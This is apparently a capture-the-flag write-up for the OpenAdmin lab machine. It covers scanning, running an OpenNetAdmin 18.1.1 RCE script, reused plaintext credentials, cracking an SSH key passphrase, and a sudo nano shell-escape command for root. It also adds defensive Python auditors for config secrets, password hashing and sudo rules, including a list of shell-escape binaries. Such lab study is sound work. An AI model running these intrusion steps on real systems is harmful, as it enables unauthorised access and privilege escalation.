OpenAdmin is an easy difficulty Linux machine that features an outdated OpenNetAdmin CMS instance. The CMS is exploited to gain a foothold, and subsequent enumeration reveals database credentials. These credentials are reused to move laterally to a low privileged user. This user is found to have access to a restricted internal application. Examination of this application reveals credentials that are used to move laterally to a second user. A sudo misconfiguration is then exploited to gain a root shell.
Nmap scan
We start by checking the running services:
nmap -sV -sC 10.10.10.171 -v
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have an SSH port and a web port open.
http://10.10.10.171 just returns the default Apache web page.
Web enumeration
To find sub-directories, I like to use gobuster:
gobuster dir -u http://10.10.10.171 -w /usr/share/wordlists/dirb/common.txt
/artwork (Status: 301)
/index.html (Status: 200)
/music (Status: 301)
/server-status (Status: 403)
After checking the login page at http://10.10.10.171/music, I found an interesting service version: v18.1.1.
By checking the page source:
<head>
<title>OpenNetAdmin :: 0wn Your Network</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="/ona/include/html_style_sheet.inc.php">
<link rel="shortcut icon" type="image/ico" href="/ona/images/favicon.ico">
<script type="text/javascript" src="/ona/include/js/global.js" language="javascript"></script>
<script type="text/javascript" src="/ona/include/xajax_drag/drag.js"></script>
<script type="text/javascript" src="/ona/include/xajax_suggest/suggest.js"></script>
The title is OpenNetAdmin. We can use searchsploit to look for an exploit matching this version:
searchsploit opennetadmin
OpenNetAdmin 13.03.01 - Remote Code Execution | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit) | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution
We have an RCE!
First shell
We can grab the exploit:
searchsploit -m exploits/php/webapps/47691.sh && chmod +x 47691.sh
Then we run it against the vulnerable endpoint:
./47691.sh http://10.10.10.171/ona/login.php
We have a first shell!
Finding ssh creds
After spending some time searching for a clue, I decided to take a look at the web root directory /var/www/html/ona/local/config/ and found an interesting PHP file called database_settings.inc.php, which contains a plaintext database password: n1nj4W4rri0R!
<?php
$ona_contexts=array (
  'DEFAULT' =>
  array (
    'databases' =>
    array (
      0 =>
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);
Now we need a valid user. On Linux, we can find usernames by listing /home or by checking /etc/passwd:
$ ls /home
jimmy
joanna
I tried SSH with both users, and the database password worked for jimmy: the same credential is reused for his system account.
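The finding above is a plaintext database credential sitting in a config file under the web root, later reused as a system password. The following is an added audit helper (my own example, not part of the original writeup or of OpenNetAdmin) that scans PHP-style config text for password-looking keys and reports the file mode, so a defender can catch this class of issue before an attacker does. The regexes, the key list and the sample config are constructed for the example.

```python
"""Flag plaintext credentials in PHP-style config files such as
database_settings.inc.php (added example, not from the writeup)."""
import re
from pathlib import Path

# Keys that usually carry a secret; db_passwd is the one found on the box.
SECRET_KEY_RE = re.compile(r"(passw(or)?d|secret|token|api[_-]?key)", re.I)

# Matches PHP array entries of the form  'key' => 'value',
PHP_ENTRY_RE = re.compile(
    r"""['"](?P<key>[A-Za-z0-9_]+)['"]\s*=>\s*['"](?P<val>[^'"]*)['"]"""
)


def find_plaintext_secrets(config_text):
    """Return (key, value) pairs whose key looks like a credential."""
    hits = []
    for m in PHP_ENTRY_RE.finditer(config_text):
        if SECRET_KEY_RE.search(m.group("key")) and m.group("val"):
            hits.append((m.group("key"), m.group("val")))
    return hits


def redact(value):
    """Keep only the first two characters so a report identifies, not leaks."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "**"


def audit_file(path):
    """Scan one file on disk and report secrets plus its permission bits."""
    p = Path(path)
    mode = p.stat().st_mode & 0o777
    return {
        "path": str(p),
        "mode": oct(mode),
        "world_readable": bool(mode & 0o004),
        "secrets": [(k, redact(v)) for k, v in
                    find_plaintext_secrets(p.read_text(errors="replace"))],
    }


# Constructed sample modelled on the database_settings.inc.php shown above.
SAMPLE_CONFIG = """<?php
$ona_contexts=array (
  'DEFAULT' => array (
    'databases' => array (
      0 => array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
  ),
);
"""

if __name__ == "__main__":
    for key, val in find_plaintext_secrets(SAMPLE_CONFIG):
        print(f"plaintext credential in key {key}: {redact(val)}")
```

Point audit_file at real config directories (for example the web root's local/config/) from a cron job or CI step; any hit is a prompt to rotate the credential and to check whether the same value is used for any system or SSH account.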
Owning user
Checking the listening services with netstat -antp shows a few services bound to localhost only.
To reach them we need port forwarding; the easiest way here is an SSH local forward:
ssh -L 52846:localhost:52846 jimmy@10.10.10.171
First I tried curl http://127.0.0.1:52846, which returned what looked like a login page. Opening it in the browser shows the actual page.
At this point we can look for the DocumentRoot of this page, since the files there may contain login credentials.
To find it, we check the Apache config files:
ls -l /etc/apache2/sites-available/
total 16
-rw-r--r-- 1 root root 6338 Jul 16 2019 default-ssl.conf
-rw-r--r-- 1 root root 303 Nov 23 17:13 internal.conf
-rw-r--r-- 1 root root 1329 Nov 22 14:24 openadmin.conf
openadmin.conf serves the default Apache web root, but internal.conf has:
Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal
    <IfModule mpm_itk_module>
        AssignUserID joanna joanna
    </IfModule>
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
The index.php in /var/www/internal has a hard-coded password check:
if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
Looking this hash up on CrackStation (https://crackstation.net/) gives Revealed as the password.
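The reason a lookup site can resolve that hash instantly is that index.php stores a single unsalted SHA-512 of the password and compares it with plain equality. The block below is an added example (mine, not code from the writeup or the box) that reproduces that scheme in Python beside a hardened version using a per-user random salt, the memory-hard scrypt KDF and a constant-time comparison. STORED_HASH is the hex value copied from index.php above; the candidate password and all other values are from the writeup or constructed.

```python
"""Unsalted fast hash (as in index.php) beside a salted, slow, constant-time
verifier (added example, not from the writeup)."""
import hashlib
import hmac
import os

# Hex digest hard-coded in /var/www/internal/index.php, copied from the page.
STORED_HASH = (
    "00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758e"
    "ebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1"
)


def unsalted_digest(password):
    """Equivalent of PHP hash('sha512', $password): no salt, one fast round.
    Every user with the same password gets the same digest, so one lookup
    table entry breaks all of them at once."""
    return hashlib.sha512(password.encode()).hexdigest()


def verify_unsalted(password, stored_hex):
    """The index.php scheme: plain equality against a fixed hex digest."""
    return unsalted_digest(password) == stored_hex


def make_salted_record(password, n=2 ** 14):
    """Hardened form: 16 random salt bytes and scrypt (memory-hard), so
    precomputed tables are useless and each guess costs real work."""
    salt = os.urandom(16)
    key = hashlib.scrypt(password.encode(), salt=salt, n=n, r=8, p=1, dklen=32)
    return {"salt": salt.hex(), "n": n, "key": key.hex()}


def verify_salted(password, record):
    """Recompute with the stored salt and compare in constant time, so the
    comparison itself does not leak how many leading bytes matched."""
    key = hashlib.scrypt(password.encode(), salt=bytes.fromhex(record["salt"]),
                         n=record["n"], r=8, p=1, dklen=32)
    return hmac.compare_digest(key, bytes.fromhex(record["key"]))


if __name__ == "__main__":
    print("candidate 'Revealed' matches the stored hex:",
          verify_unsalted("Revealed", STORED_HASH))
    rec = make_salted_record("Revealed")
    print("salted record:", rec)
    print("salted verify:", verify_salted("Revealed", rec))
```

In PHP the equivalent of the hardened path is password_hash() with password_verify(), which handle the salt and the slow hash for you; the scrypt parameters here (n=2^14, r=8, p=1) are a modest example setting, not a recommendation for production.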
A private id_rsa key appears after logging in to the web page. Its passphrase can be cracked with john: save the key in a file called id_rsa, then convert it to John's format:
/opt/sshng2john.py id_rsa > to_crack
john to_crack -w=/usr/share/wordlists/rockyou.txt
The passphrase is bloodninjas.
Now we can SSH in as joanna with this id_rsa and the cracked passphrase.
Owning root
The first thing to do is check whether we can run commands as root without a password:
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
We can run /bin/nano /opt/priv as any user, including root, without a password.
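A NOPASSWD rule on an interactive editor is the whole privilege escalation here, and it is easy to spot in an audit. The block below is an added example (mine, not from the writeup or GTFOBins) that parses sudo -l output, extracts each rule's run-as user, tags and commands, and flags NOPASSWD rules whose program is a known shell-escape binary. The SHELL_ESCAPE_BINS list is illustrative and constructed; the sample input is the joanna output from the box plus one constructed benign rule for contrast.

```python
"""Audit 'sudo -l' output for NOPASSWD rules on programs that can spawn a
shell (added example, not from the writeup)."""
import os
import re

# Interactive programs GTFOBins documents as able to run a shell or write
# arbitrary files from inside the program. Illustrative, not exhaustive.
SHELL_ESCAPE_BINS = {
    "nano", "vim", "vi", "less", "more", "man", "find", "awk",
    "python", "python3", "perl", "ruby", "env", "bash", "sh",
}

# One rule line:  (runas) TAG: command [, command ...]
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$"
)


def parse_sudo_l(output):
    """Return the rules that follow 'User X may run the following commands'."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        commands = [c.strip() for c in m.group("cmd").split(",") if c.strip()]
        rules.append({"runas": m.group("runas").strip(),
                      "tags": tags, "commands": commands})
    return rules


def audit_rules(rules):
    """Flag NOPASSWD rules whose program offers a documented shell escape."""
    findings = []
    for rule in rules:
        for cmd in rule["commands"]:
            binary = os.path.basename(cmd.split()[0])
            if "NOPASSWD" in rule["tags"] and binary in SHELL_ESCAPE_BINS:
                findings.append({
                    "binary": binary,
                    "command": cmd,
                    "runas": rule["runas"],
                    "advice": "use sudoedit for file edits, or a non-interactive "
                              "wrapper script, instead of granting an editor",
                })
    return findings


# Constructed sample: the box's sudo -l output plus one benign rule.
SAMPLE_SUDO_L = r"""Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
    (root) /usr/bin/id
"""

if __name__ == "__main__":
    for f in audit_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{f['binary']} as {f['runas']} without password: {f['command']}")
        print("  advice:", f["advice"])
```

Run it over the output of sudo -l for each account on a host (or over sudoers itself after visudo -c); the same logic also catches the common "NOPASSWD: ALL" variant if you treat runas ALL with command ALL as a finding.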
Gtfobins nano: https://gtfobins.github.io/gtfobins/nano/
Commands:
sudo -u root /bin/nano /opt/priv
Press Ctrl+R then Ctrl+X, type reset; sh 1>&0 2>&0 and press Enter.
Box owned! Your feedback is appreciated :)